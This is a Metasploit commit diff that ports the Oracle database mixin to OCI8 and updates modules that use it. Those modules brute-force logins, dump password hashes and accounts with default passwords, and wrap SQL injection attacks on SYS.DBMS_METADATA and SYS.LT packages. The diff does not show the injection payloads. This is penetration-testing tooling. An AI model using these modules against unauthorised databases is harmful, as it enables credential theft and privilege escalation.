updated oracle mixin and adjusted affected modules. now compatible with ruby 1.8 and 1.9
git-svn-id: file:///home/svn/framework3/trunk@7688 4d416f70-5f16-0410-b530-b9f4589650da
This commit is contained in:
parent
d4f1314025
commit
93d02320cf
|
@ -2,103 +2,147 @@
|
|||
#
|
||||
# This module provides methods for communicating with a host running oracle.
|
||||
# Dependencies:
|
||||
# - Oracle Instant Client
|
||||
# - ruby-dbi
|
||||
# - ruby-oci8
|
||||
# - Oracle Instant Client
|
||||
# - ruby-oci8
|
||||
#
|
||||
# Rory McCune <rorym@nmrconsult.net>
|
||||
# MC <mc@metasploit.com>
|
||||
#
|
||||
###
|
||||
|
||||
require 'msf/core'
|
||||
|
||||
module Msf
|
||||
module Exploit::ORACLE
|
||||
|
||||
|
||||
|
||||
def initialize(info = {})
|
||||
super
|
||||
|
||||
register_options(
|
||||
[
|
||||
OptString.new('RHOST', [ true, 'The Oracle host.', '']),
|
||||
OptString.new('RPORT', [ true, 'The TNS port.', '1521']),
|
||||
OptString.new('SID', [ true, 'The sid to authenticate with.', 'ORCL']),
|
||||
OptString.new('DBUSER', [ true, 'The username to authenticate with.', 'SCOTT']),
|
||||
OptString.new('DBPASS', [ true, 'The password to authenticate with.', 'TIGER']),
|
||||
OptString.new('RHOST', [ true, 'The Oracle host.', '']),
|
||||
OptString.new('RPORT', [ true, 'The TNS port.', '1521']),
|
||||
OptString.new('SID', [ true, 'The sid to authenticate with.', 'ORCL']),
|
||||
OptString.new('DBUSER', [ true, 'The username to authenticate with.', 'SCOTT']),
|
||||
OptString.new('DBPASS', [ true, 'The password to authenticate with.', 'TIGER']),
|
||||
], Msf::Exploit::ORACLE
|
||||
)
|
||||
|
||||
begin
|
||||
require 'rubygems'
|
||||
gem 'dbi'
|
||||
require 'dbi'
|
||||
@havedbi = true
|
||||
require 'oci8'
|
||||
rescue ::LoadError
|
||||
@havedbi = false
|
||||
end
|
||||
|
||||
if(not @havedbi)
|
||||
begin
|
||||
require 'dbi'
|
||||
@havedbi = true
|
||||
rescue ::LoadError
|
||||
@havedbi = false
|
||||
end
|
||||
print_error("oci8 module not loaded, is installed ok?")
|
||||
raise RuntimeError, "The oci8 module is not available!"
|
||||
end
|
||||
end
|
||||
|
||||
|
||||
def connect
|
||||
print_status("Connecting to #{datastore['RHOST']}:#{datastore['RPORT']}/#{datastore['SID']}...")
|
||||
|
||||
if ( not @havedbi )
|
||||
print_error("The dbi module is not available!")
|
||||
raise RuntimeError, "The dbi module is not available!"
|
||||
# Create a Connection to the Database
|
||||
if datastore['DBUSER'] == 'SYS' || datastore['DBUSER'] == 'SYSTEM'
|
||||
handle = OCI8.new(datastore['DBUSER'],
|
||||
datastore['DBPASS'],
|
||||
"//#{datastore['RHOST']}:#{datastore['RPORT']}/#{datastore['SID']}",
|
||||
:SYSDBA)
|
||||
else
|
||||
handle = OCI8.new(datastore['DBUSER'],
|
||||
datastore['DBPASS'],
|
||||
"//#{datastore['RHOST']}:#{datastore['RPORT']}/#{datastore['SID']}")
|
||||
end
|
||||
|
||||
|
||||
begin
|
||||
handle = DBI.connect(
|
||||
"DBI:OCI8://#{datastore['RHOST']}:#{datastore['RPORT']}/#{datastore['SID']}",
|
||||
"#{datastore['DBUSER']}",
|
||||
"#{datastore['DBPASS']}"
|
||||
)
|
||||
rescue ::DBI::DatabaseError => e
|
||||
print_error("Oracle DB connection failed: #{e.class} #{e.to_s}")
|
||||
handle.disconnect_all if handle
|
||||
return
|
||||
rescue ::Interrupt
|
||||
raise $!
|
||||
rescue DBI::InterfaceError
|
||||
print_error("The Oracle Database Instant Client has not been installed")
|
||||
raise RuntimeError, "Missing OCI8 DBI driver"
|
||||
end
|
||||
|
||||
# 23.11 passing a raise call after the print_error, so we get the error message and the error is passed on in case the module needs it (eg, login_brute)
|
||||
rescue ::OCIError => e
|
||||
# print_error("#{e.class} #{e.to_s}")
|
||||
raise
|
||||
end
|
||||
|
||||
def disconnect
|
||||
disconnect_all
|
||||
connect.logoff
|
||||
end
|
||||
|
||||
def prepare_exec(exec)
|
||||
def prepare_exec(sql)
|
||||
begin
|
||||
sploit = connect.prepare(exec)
|
||||
sploit.execute
|
||||
rescue DBI::DatabaseError => e
|
||||
print_status("#{e.to_s}")
|
||||
sploit = connect.parse(sql)
|
||||
rescue ::OCIError => e
|
||||
print_error("#{e.to_s}")
|
||||
return
|
||||
end
|
||||
|
||||
# DEBUG
|
||||
# print_status("did the parse sploit type is " + sploit.type.to_s)
|
||||
begin
|
||||
sploit.each do | data |
|
||||
print_status("#{data.join(",").to_s}")
|
||||
end
|
||||
print_status("Done...")
|
||||
sploit.finish
|
||||
rescue DBI::DatabaseError => e
|
||||
#print_error("#{e.to_s}")
|
||||
if ( e.to_s =~ /ORA-24374: define not done before fetch or execute and fetch/ )
|
||||
print_status("Done...")
|
||||
else
|
||||
return
|
||||
sploit.exec
|
||||
rescue ::OCIError => e
|
||||
if ( e.to_s =~ /ORA-00942: table or view does not exist/ )
|
||||
print_status("ORA-00942: table or view does not exist")
|
||||
raise RuntimeError, "ORA-00942: table or view does not exist"
|
||||
end
|
||||
print_status e.to_s
|
||||
end
|
||||
|
||||
# The Handling is a little different for certain types of query
|
||||
# Mainly Select needs a fetch statement to get the data
|
||||
# Also return types are a little different (some return rows changed so we can used that)
|
||||
# The case statement could probaby be collapsed a bit but leaving it as is for the moment
|
||||
# in case it's useful later...
|
||||
|
||||
# Select Queries
|
||||
case sploit.type
|
||||
when 1, :select_stmt
|
||||
# Create an array to return to the calling function
|
||||
results = Array.new
|
||||
while r = sploit.fetch()
|
||||
str = r.join(',')
|
||||
# Removed this as it should really be down to the exploit to decide what to print
|
||||
# eg leaving this in messes up oraenum.
|
||||
# print_status(str)
|
||||
results << str
|
||||
end
|
||||
|
||||
return results
|
||||
|
||||
# Update Queries
|
||||
when 2, :update_stmt
|
||||
connect.commit
|
||||
|
||||
# If we were successful our return should be a Fixnum with the number of rows updated
|
||||
result = ['UPDATE Successful ' + sploit.row_count.to_s + ' Rows Updated']
|
||||
return result
|
||||
# Delete Queries
|
||||
when 3, :delete_stmt
|
||||
connect.commit
|
||||
# If we were successful our return should be a Fixnum with the number of rows updated
|
||||
result = ['DELETE Successful ' + sploit.row_count.to_s + ' Rows Deleted']
|
||||
return result
|
||||
# Insert Queries
|
||||
when 4, :insert_stmt
|
||||
connect.commit
|
||||
# If we were successful our return should be a Fixnum with the number of rows updated
|
||||
result = ['INSERT Successful ' + sploit.row_count.to_s + ' Rows Inserted']
|
||||
return result
|
||||
# Create Queries
|
||||
when 5, :create_stmt
|
||||
connect.commit
|
||||
if sploit
|
||||
print_status('CREATE successful')
|
||||
end
|
||||
when 6, :drop_stmt
|
||||
connect.commit
|
||||
if sploit
|
||||
print_status('DROP successful')
|
||||
end
|
||||
when 7, :alter_stmt
|
||||
connect.commit
|
||||
if sploit
|
||||
print_status('Alter successful')
|
||||
end
|
||||
when 8, :begin_stmt
|
||||
connect.commit
|
||||
when 9, :declare_stmt
|
||||
connect.commit
|
||||
else
|
||||
print_status("Didn't match Query Type!")
|
||||
print_status("Query type passed was " + sploit.type.to_s)
|
||||
end
|
||||
end
|
||||
|
||||
|
||||
end
|
||||
end
|
||||
|
|
|
@ -48,14 +48,14 @@ class Metasploit3 < Msf::Auxiliary
|
|||
|
||||
fd = CSV.foreach(list) do |brute|
|
||||
|
||||
datastore['DBUSER'] = brute[2]
|
||||
datastore['DBPASS'] = brute[3]
|
||||
datastore['DBUSER'] = brute[2].downcase
|
||||
datastore['DBPASS'] = brute[3].downcase
|
||||
|
||||
begin
|
||||
c = connect
|
||||
c.disconnect
|
||||
rescue ::Exception => e
|
||||
|
||||
connect
|
||||
disconnect
|
||||
rescue ::OCIError => e
|
||||
print_error("#{e.class} #{e.to_s}")
|
||||
else
|
||||
if (not e)
|
||||
report_note(
|
||||
|
|
|
@ -27,37 +27,14 @@ class Metasploit3 < Msf::Auxiliary
|
|||
|
||||
end
|
||||
|
||||
def plsql_query(exec)
|
||||
@dbh ||= connect
|
||||
|
||||
querydata = ""
|
||||
|
||||
sploit = @dbh.prepare(exec)
|
||||
sploit.execute
|
||||
|
||||
begin
|
||||
sploit.each do | data |
|
||||
querydata << ("#{data.join(",").to_s} \n")
|
||||
end
|
||||
sploit.finish
|
||||
rescue DBI::DatabaseError => e
|
||||
#print_error("#{e.to_s}")
|
||||
if ( e.to_s =~ /ORA-24374: define not done before fetch or execute and fetch/ )
|
||||
print_status("Done...")
|
||||
else
|
||||
return
|
||||
end
|
||||
end
|
||||
return querydata
|
||||
end
|
||||
|
||||
def run
|
||||
begin
|
||||
#Get all values from v$parameter
|
||||
query = 'select name,value from v$parameter'
|
||||
vparm = {}
|
||||
params = plsql_query(query)
|
||||
params.each_line do |l|
|
||||
params = prepare_exec(query)
|
||||
params.each do |l|
|
||||
name,value = l.split(",")
|
||||
vparm["#{name}"] = value
|
||||
end
|
||||
|
@ -68,14 +45,15 @@ class Metasploit3 < Msf::Auxiliary
|
|||
|
||||
#Version Check
|
||||
query = 'select * from v$version'
|
||||
ver = plsql_query(query)
|
||||
ver = prepare_exec(query)
|
||||
print_status("The versions of the Components are:")
|
||||
ver.each_line do |v|
|
||||
ver.each do |v|
|
||||
print_status("\t#{v.chomp}")
|
||||
report_note(:host => datastore['RHOST'], :proto => 'TNS', :port => datastore['RPORT'], :type => 'ORA_ENUM', :data => "Component Version: #{v.chomp}")
|
||||
end
|
||||
|
||||
#Saving Major Release Number for other checks
|
||||
majorrel = ver.scan(/Edition Release (\d*)./)
|
||||
majorrel = ver[0].scan(/Edition Release (\d*)./)
|
||||
|
||||
#-------------------------------------------------------
|
||||
#Audit Check
|
||||
|
@ -125,11 +103,11 @@ class Metasploit3 < Msf::Auxiliary
|
|||
end
|
||||
end
|
||||
|
||||
print_status("\tUTL Directory Access is set to #{vparm["utl_file_dir"].strip}") if vparm["utl_file_dir"] != " "
|
||||
report_note(:host => datastore['RHOST'], :proto => 'TNS', :port => datastore['RPORT'], :type => 'ORA_ENUM', :data => "UTL_DIR: #{ vparm["utl_file_dir"]}") if not vparm["utl_file_dir"].empty?
|
||||
print_status("\tUTL Directory Access is set to #{vparm["utl_file_dir"]}") if vparm["utl_file_dir"] != " "
|
||||
report_note(:host => datastore['RHOST'], :proto => 'TNS', :port => datastore['RPORT'], :type => 'ORA_ENUM', :data => "UTL_DIR: #{ vparm["utl_file_dir"]}") if not vparm["utl_file_dir"]#.empty?
|
||||
|
||||
print_status("\tAudit log is saved at #{vparm["audit_file_dest"].strip}")
|
||||
report_note(:host => datastore['RHOST'], :proto => 'TNS', :port => datastore['RPORT'], :type => 'ORA_ENUM', :data => "Audit Log Location: #{ vparm["audit_file_dest"]}") if not vparm["audit_file_dest"].empty?
|
||||
print_status("\tAudit log is saved at #{vparm["audit_file_dest"]}")
|
||||
report_note(:host => datastore['RHOST'], :proto => 'TNS', :port => datastore['RPORT'], :type => 'ORA_ENUM', :data => "Audit Log Location: #{ vparm["audit_file_dest"]}") if not vparm["audit_file_dest"]#.empty?
|
||||
end
|
||||
|
||||
#-------------------------------------------------------
|
||||
|
@ -142,9 +120,9 @@ class Metasploit3 < Msf::Auxiliary
|
|||
WHERE resource_name = 'PASSWORD_LOCK_TIME'
|
||||
AND profile = 'DEFAULT'
|
||||
|
|
||||
lockout = plsql_query(query)
|
||||
print_status("\tCurrent Account Lockout Time is set to #{lockout.chomp}")
|
||||
report_note(:host => datastore['RHOST'], :proto => 'TNS', :port => datastore['RPORT'], :type => 'ORA_ENUM', :data => "Account Lockout Time: #{lockout.chomp}")
|
||||
lockout = prepare_exec(query)
|
||||
print_status("\tCurrent Account Lockout Time is set to #{lockout[0].chomp}")
|
||||
report_note(:host => datastore['RHOST'], :proto => 'TNS', :port => datastore['RPORT'], :type => 'ORA_ENUM', :data => "Account Lockout Time: #{lockout[0].chomp}")
|
||||
|
||||
rescue => e
|
||||
if e.to_s =~ /ORA-00942: table or view does not exist/
|
||||
|
@ -160,9 +138,9 @@ class Metasploit3 < Msf::Auxiliary
|
|||
WHERE resource_name = 'FAILED_LOGIN_ATTEMPTS'
|
||||
AND profile = 'DEFAULT'
|
||||
|
|
||||
failed_logins = plsql_query(query)
|
||||
print_status("\tThe Number of Failed Logins before an account is locked is set to #{failed_logins.chomp}")
|
||||
report_note(:host => datastore['RHOST'], :proto => 'TNS', :port => datastore['RPORT'], :type => 'ORA_ENUM', :data => "Account Fail Logins Permitted: #{failed_logins.chomp}")
|
||||
failed_logins = prepare_exec(query)
|
||||
print_status("\tThe Number of Failed Logins before an account is locked is set to #{failed_logins[0].chomp}")
|
||||
report_note(:host => datastore['RHOST'], :proto => 'TNS', :port => datastore['RPORT'], :type => 'ORA_ENUM', :data => "Account Fail Logins Permitted: #{failed_logins[0].chomp}")
|
||||
|
||||
rescue => e
|
||||
if e.to_s =~ /ORA-00942: table or view does not exist/
|
||||
|
@ -178,9 +156,9 @@ class Metasploit3 < Msf::Auxiliary
|
|||
WHERE resource_name = 'FAILED_LOGIN_ATTEMPTS'
|
||||
AND profile = 'DEFAULT'
|
||||
|
|
||||
grace_time = plsql_query(query)
|
||||
print_status("\tThe Password Grace Time is set to #{grace_time.chomp}")
|
||||
report_note(:host => datastore['RHOST'], :proto => 'TNS', :port => datastore['RPORT'], :type => 'ORA_ENUM', :data => "Account Password Grace Time: #{grace_time.chomp}")
|
||||
grace_time = prepare_exec(query)
|
||||
print_status("\tThe Password Grace Time is set to #{grace_time[0].chomp}")
|
||||
report_note(:host => datastore['RHOST'], :proto => 'TNS', :port => datastore['RPORT'], :type => 'ORA_ENUM', :data => "Account Password Grace Time: #{grace_time[0].chomp}")
|
||||
|
||||
rescue => e
|
||||
if e.to_s =~ /ORA-00942: table or view does not exist/
|
||||
|
@ -196,9 +174,9 @@ class Metasploit3 < Msf::Auxiliary
|
|||
WHERE resource_name = 'PASSWORD_LIFE_TIME'
|
||||
AND profile = 'DEFAULT'
|
||||
|
|
||||
passlife_time = plsql_query(query)
|
||||
print_status("\tThe Lifetime of Passwords is set to #{passlife_time.chomp}")
|
||||
report_note(:host => datastore['RHOST'], :proto => 'TNS', :port => datastore['RPORT'], :type => 'ORA_ENUM', :data => "Password Life Time: #{passlife_time.chomp}")
|
||||
passlife_time = prepare_exec(query)
|
||||
print_status("\tThe Lifetime of Passwords is set to #{passlife_time[0].chomp}")
|
||||
report_note(:host => datastore['RHOST'], :proto => 'TNS', :port => datastore['RPORT'], :type => 'ORA_ENUM', :data => "Password Life Time: #{passlife_time[0].chomp}")
|
||||
|
||||
rescue => e
|
||||
if e.to_s =~ /ORA-00942: table or view does not exist/
|
||||
|
@ -213,9 +191,9 @@ class Metasploit3 < Msf::Auxiliary
|
|||
WHERE resource_name = 'PASSWORD_REUSE_TIME'
|
||||
AND profile = 'DEFAULT'
|
||||
|
|
||||
passreuse = plsql_query(query)
|
||||
print_status("\tThe Number of Times a Password can be reused is set to #{passreuse.chomp}")
|
||||
report_note(:host => datastore['RHOST'], :proto => 'TNS', :port => datastore['RPORT'], :type => 'ORA_ENUM', :data => "Password Reuse Time: #{passreuse.chomp}")
|
||||
passreuse = prepare_exec(query)
|
||||
print_status("\tThe Number of Times a Password can be reused is set to #{passreuse[0].chomp}")
|
||||
report_note(:host => datastore['RHOST'], :proto => 'TNS', :port => datastore['RPORT'], :type => 'ORA_ENUM', :data => "Password Reuse Time: #{passreuse[0].chomp}")
|
||||
|
||||
rescue => e
|
||||
if e.to_s =~ /ORA-00942: table or view does not exist/
|
||||
|
@ -230,10 +208,10 @@ class Metasploit3 < Msf::Auxiliary
|
|||
WHERE resource_name = 'PASSWORD_REUSE_MAX'
|
||||
AND profile = 'DEFAULT'
|
||||
|
|
||||
passreusemax = plsql_query(query)
|
||||
print_status("\tThe Maximun Number of Times a Password needs to be changed before it can be reused is set to #{passreusemax.chomp}")
|
||||
report_note(:host => datastore['RHOST'], :proto => 'TNS', :port => datastore['RPORT'], :type => 'ORA_ENUM', :data => "Password Maximun Reuse Time: #{passreusemax.chomp}")
|
||||
print_status("\tThe Number of Times a Password can be reused is set to #{passreuse.chomp}")
|
||||
passreusemax = prepare_exec(query)
|
||||
print_status("\tThe Maximun Number of Times a Password needs to be changed before it can be reused is set to #{passreusemax[0].chomp}")
|
||||
report_note(:host => datastore['RHOST'], :proto => 'TNS', :port => datastore['RPORT'], :type => 'ORA_ENUM', :data => "Password Maximun Reuse Time: #{passreusemax[0].chomp}")
|
||||
print_status("\tThe Number of Times a Password can be reused is set to #{passreuse[0].chomp}")
|
||||
|
||||
rescue => e
|
||||
if e.to_s =~ /ORA-00942: table or view does not exist/
|
||||
|
@ -248,8 +226,8 @@ class Metasploit3 < Msf::Auxiliary
|
|||
WHERE resource_name = 'PASSWORD_VERIFY_FUNCTION'
|
||||
AND profile = 'DEFAULT'
|
||||
|
|
||||
passrand = plsql_query(query)
|
||||
if passrand =~ /NULL/
|
||||
passrand = prepare_exec(query)
|
||||
if passrand[0] =~ /NULL/
|
||||
print_status("\tPassword Complexity is not checked")
|
||||
report_note(:host => datastore['RHOST'], :proto => 'TNS', :port => datastore['RPORT'], :type => 'ORA_ENUM', :data => "Password Complexity is not being checked for new passwords")
|
||||
else
|
||||
|
@ -265,6 +243,7 @@ class Metasploit3 < Msf::Auxiliary
|
|||
end
|
||||
|
||||
#-------------------------------------------------------
|
||||
|
||||
begin
|
||||
|
||||
if majorrel.join.to_i < 11
|
||||
|
@ -274,9 +253,9 @@ class Metasploit3 < Msf::Auxiliary
|
|||
FROM sys.user$
|
||||
where password != 'null' and type# = 1 and astatus = 0
|
||||
|
|
||||
activeacc = plsql_query(query)
|
||||
activeacc = prepare_exec(query)
|
||||
print_status("Active Accounts on the System in format Username,Hash are:")
|
||||
activeacc.each_line do |aa|
|
||||
activeacc.each do |aa|
|
||||
print_status("\t#{aa.chomp}")
|
||||
report_note(:host => datastore['RHOST'], :proto => 'TNS', :port => datastore['RPORT'], :type => 'ORA_ENUM', :data => "Active Account #{aa.chomp}")
|
||||
end
|
||||
|
@ -286,9 +265,9 @@ class Metasploit3 < Msf::Auxiliary
|
|||
FROM sys.user$
|
||||
where password != 'null' and type# = 1 and astatus = 0
|
||||
|
|
||||
activeacc = plsql_query(query)
|
||||
activeacc = prepare_exec(query)
|
||||
print_status("Active Accounts on the System in format Username,Password,Spare4 are:")
|
||||
activeacc.each_line do |aa|
|
||||
activeacc.each do |aa|
|
||||
print_status("\t#{aa.chomp}")
|
||||
report_note(:host => datastore['RHOST'], :proto => 'TNS', :port => datastore['RPORT'], :type => 'ORA_ENUM', :data => "Active Account #{aa.chomp}")
|
||||
end
|
||||
|
@ -307,9 +286,9 @@ class Metasploit3 < Msf::Auxiliary
|
|||
FROM dba_users
|
||||
WHERE account_status = 'EXPIRED & LOCKED'
|
||||
|
|
||||
disabledacc = plsql_query(query)
|
||||
disabledacc = prepare_exec(query)
|
||||
print_status("Expired or Locked Accounts on the System in format Username,Hash are:")
|
||||
disabledacc.each_line do |da|
|
||||
disabledacc.each do |da|
|
||||
print_status("\t#{da.chomp}")
|
||||
report_note(:host => datastore['RHOST'], :proto => 'TNS', :port => datastore['RPORT'], :type => 'ORA_ENUM', :data => "Disabled Account #{da.chomp}")
|
||||
end
|
||||
|
@ -319,9 +298,9 @@ class Metasploit3 < Msf::Auxiliary
|
|||
FROM sys.user$
|
||||
where password != 'null' and type# = 1 and astatus = 8 or astatus = 9
|
||||
|
|
||||
disabledacc = plsql_query(query)
|
||||
disabledacc = prepare_exec(query)
|
||||
print_status("Expired or Locked Accounts on the System in format Username,Password,Spare4 are:")
|
||||
disabledacc.each_line do |da|
|
||||
disabledacc.each do |da|
|
||||
print_status("\t#{da.chomp}")
|
||||
report_note(:host => datastore['RHOST'], :proto => 'TNS', :port => datastore['RPORT'], :type => 'ORA_ENUM', :data => "Disabled Account #{da.chomp}")
|
||||
end
|
||||
|
@ -339,9 +318,9 @@ class Metasploit3 < Msf::Auxiliary
|
|||
FROM dba_role_privs
|
||||
WHERE granted_role = 'DBA'
|
||||
|
|
||||
dbaacc = plsql_query(query)
|
||||
dbaacc = prepare_exec(query)
|
||||
print_status("Accounts with DBA Privilege in format Username,Hash on the System are:")
|
||||
dbaacc.each_line do |dba|
|
||||
dbaacc.each do |dba|
|
||||
print_status("\t#{dba.chomp}")
|
||||
report_note(:host => datastore['RHOST'], :proto => 'TNS', :port => datastore['RPORT'], :type => 'ORA_ENUM', :data => "Account with DBA Priv #{dba.chomp}")
|
||||
end
|
||||
|
@ -358,9 +337,9 @@ class Metasploit3 < Msf::Auxiliary
|
|||
FROM dba_sys_privs
|
||||
WHERE privilege = 'ALTER SYSTEM'
|
||||
|
|
||||
altersys = plsql_query(query)
|
||||
altersys = prepare_exec(query)
|
||||
print_status("Accounts with Alter System Privilege on the System are:")
|
||||
altersys.each_line do |as|
|
||||
altersys.each do |as|
|
||||
print_status("\t#{as.chomp}")
|
||||
report_note(:host => datastore['RHOST'], :proto => 'TNS', :port => datastore['RPORT'], :type => 'ORA_ENUM', :data => "Account with ALTER SYSTEM Priv #{as.chomp}")
|
||||
end
|
||||
|
@ -377,9 +356,9 @@ class Metasploit3 < Msf::Auxiliary
|
|||
FROM dba_sys_privs
|
||||
WHERE privilege = 'JAVA ADMIN'
|
||||
|
|
||||
javaacc = plsql_query(query)
|
||||
javaacc = prepare_exec(query)
|
||||
print_status("Accounts with JAVA ADMIN Privilege on the System are:")
|
||||
javaacc.each_line do |j|
|
||||
javaacc.each do |j|
|
||||
print_status("\t#{j.chomp}")
|
||||
report_note(:host => datastore['RHOST'], :proto => 'TNS', :port => datastore['RPORT'], :type => 'ORA_ENUM', :data => "Account with JAVA ADMIN Priv #{j.chomp}")
|
||||
end
|
||||
|
@ -397,9 +376,9 @@ class Metasploit3 < Msf::Auxiliary
|
|||
where privilege = 'CREATE LIBRARY'
|
||||
or privilege = 'CREATE ANY'
|
||||
|
|
||||
libpriv = plsql_query(query)
|
||||
libpriv = prepare_exec(query)
|
||||
print_status("Accounts that have CREATE LIBRARY Privilege on the System are:")
|
||||
libpriv.each_line do |lp|
|
||||
libpriv.each do |lp|
|
||||
print_status("\t#{lp.chomp}")
|
||||
report_note(:host => datastore['RHOST'], :proto => 'TNS', :port => datastore['RPORT'], :type => 'ORA_ENUM', :data => "Account with CREATE LIBRARY Priv #{lp.chomp}")
|
||||
end
|
||||
|
@ -417,7 +396,7 @@ class Metasploit3 < Msf::Auxiliary
|
|||
query = %Q|
|
||||
SELECT * FROM dba_users_with_defpwd
|
||||
|
|
||||
defpwd = plsql_query(query)
|
||||
defpwd = prepare_exec(query)
|
||||
defpwd.each do |dp|
|
||||
print_status("\tThe account #{dp.chomp} has a default password.")
|
||||
report_note(:host => datastore['RHOST'], :proto => 'TNS', :port => datastore['RPORT'], :type => 'ORA_ENUM', :data => "Account with Default Password #{dp.chomp}")
|
||||
|
@ -430,9 +409,9 @@ class Metasploit3 < Msf::Auxiliary
|
|||
where password != 'null' and type# = 1
|
||||
|
|
||||
ordfltpss = "#{File.join(Msf::Config.install_root, "data", "wordlists", "oracle_default_hashes.txt")}"
|
||||
returnedstring = plsql_query(query)
|
||||
returnedstring = prepare_exec(query)
|
||||
accts = {}
|
||||
returnedstring.each_line do |record|
|
||||
returnedstring.each do |record|
|
||||
user,pass = record.split(",")
|
||||
accts["#{pass.chomp}"] = "#{user}"
|
||||
end
|
||||
|
|
|
@ -37,8 +37,14 @@ class Metasploit3 < Msf::Auxiliary
|
|||
query = datastore['SQL']
|
||||
|
||||
begin
|
||||
print_status("Sending statement: '#{query}'...")
|
||||
prepare_exec(query)
|
||||
print_status("Sending statement: '#{query}'...")
|
||||
result = prepare_exec(query)
|
||||
#Need this if 'cause some statements won't return anything
|
||||
if result
|
||||
result.each do |line|
|
||||
print_status(line)
|
||||
end
|
||||
end
|
||||
rescue => e
|
||||
return
|
||||
end
|
||||
|
|
|
@ -49,19 +49,15 @@ class Metasploit3 < Msf::Auxiliary
|
|||
|
||||
clean = "drop function #{name}"
|
||||
|
||||
print_status("Sending function...")
|
||||
prepare_exec(function)
|
||||
|
||||
begin
|
||||
print_status("Sending function...")
|
||||
prepare_exec(function)
|
||||
rescue => e
|
||||
return
|
||||
print_status("Attempting sql injection on SYS.DBMS_METADATA.GET_GRANTED_XML...")
|
||||
prepare_exec(package)
|
||||
rescue ::OCIError => e
|
||||
print_status("Removing function '#{name}'...")
|
||||
prepare_exec(clean)
|
||||
end
|
||||
|
||||
print_status("Attempting sql injection on SYS.DBMS_METADATA.GET_GRANTED_XML...")
|
||||
prepare_exec(package)
|
||||
|
||||
print_status("Removing function '#{name}'...")
|
||||
prepare_exec(clean)
|
||||
|
||||
end
|
||||
|
||||
end
|
||||
|
|
|
@ -49,19 +49,15 @@ class Metasploit3 < Msf::Auxiliary
|
|||
|
||||
clean = "drop function #{name}"
|
||||
|
||||
begin
|
||||
print_status("Sending function...")
|
||||
prepare_exec(function)
|
||||
rescue => e
|
||||
return
|
||||
print_status("Sending function...")
|
||||
prepare_exec(function)
|
||||
|
||||
begin
|
||||
print_status("Attempting sql injection on SYS.DBMS_METADATA.GET_XML...")
|
||||
prepare_exec(package)
|
||||
rescue ::OCIError => e
|
||||
print_status("Removing function '#{name}'...")
|
||||
prepare_exec(clean)
|
||||
end
|
||||
|
||||
print_status("Attempting sql injection on SYS.DBMS_METADATA.GET_XML...")
|
||||
prepare_exec(package)
|
||||
|
||||
print_status("Removing function '#{name}'...")
|
||||
prepare_exec(clean)
|
||||
|
||||
end
|
||||
|
||||
end
|
||||
end
|
||||
|
|
|
@ -49,19 +49,20 @@ class Metasploit3 < Msf::Auxiliary
|
|||
|
||||
clean = "drop function #{name}"
|
||||
|
||||
|
||||
print_status("Sending function...")
|
||||
prepare_exec(function)
|
||||
|
||||
begin
|
||||
print_status("Sending function...")
|
||||
prepare_exec(function)
|
||||
rescue => e
|
||||
return
|
||||
print_status("Attempting sql injection on SYS.DBMS_METADATA.OPEN...")
|
||||
prepare_exec(package)
|
||||
rescue ::OCIError => e
|
||||
if ( e.to_s =~ /ORA-24374: define not done before fetch or execute and fetch/ )
|
||||
print_status("Removing function '#{name}'...")
|
||||
prepare_exec(clean)
|
||||
else
|
||||
end
|
||||
end
|
||||
|
||||
print_status("Attempting sql injection on SYS.DBMS_METADATA.OPEN...")
|
||||
prepare_exec(package)
|
||||
|
||||
print_status("Removing function '#{name}'...")
|
||||
prepare_exec(clean)
|
||||
|
||||
end
|
||||
|
||||
end
|
||||
|
|
|
@ -57,16 +57,21 @@ class Metasploit3 < Msf::Auxiliary
|
|||
clean = "DROP FUNCTION #{cruft}"
|
||||
|
||||
print_status("Attempting sql injection on SYS.LT.COMPRESSWORKSPACE...")
|
||||
|
||||
print_status("Sending function...")
|
||||
prepare_exec(function)
|
||||
|
||||
begin
|
||||
print_status("Sending function...")
|
||||
prepare_exec(function)
|
||||
rescue => e
|
||||
return
|
||||
prepare_exec(package1)
|
||||
prepare_exec(package2)
|
||||
rescue => e
|
||||
if ( e.to_s =~ /No Data/ )
|
||||
print_status("Removing function '#{cruft}'...")
|
||||
prepare_exec(clean)
|
||||
else
|
||||
return
|
||||
end
|
||||
end
|
||||
prepare_exec(package1)
|
||||
prepare_exec(package2)
|
||||
print_status("Removing function '#{cruft}'...")
|
||||
prepare_exec(clean)
|
||||
|
||||
end
|
||||
|
||||
|
|
|
@ -87,14 +87,8 @@ class Metasploit3 < Msf::Auxiliary
|
|||
clean = "DROP FUNCTION #{cruft}"
|
||||
|
||||
print_status("Attempting sql injection on SYS.LT.ROLLBACKWORKSPACE...")
|
||||
begin
|
||||
prepare_exec(sql)
|
||||
rescue => e
|
||||
return
|
||||
end
|
||||
|
||||
prepare_exec(sql)
|
||||
print_status("Removing function '#{cruft}'...")
|
||||
prepare_exec(clean)
|
||||
end
|
||||
|
||||
end
|
||||
|
|
Loading…
Reference in New Issue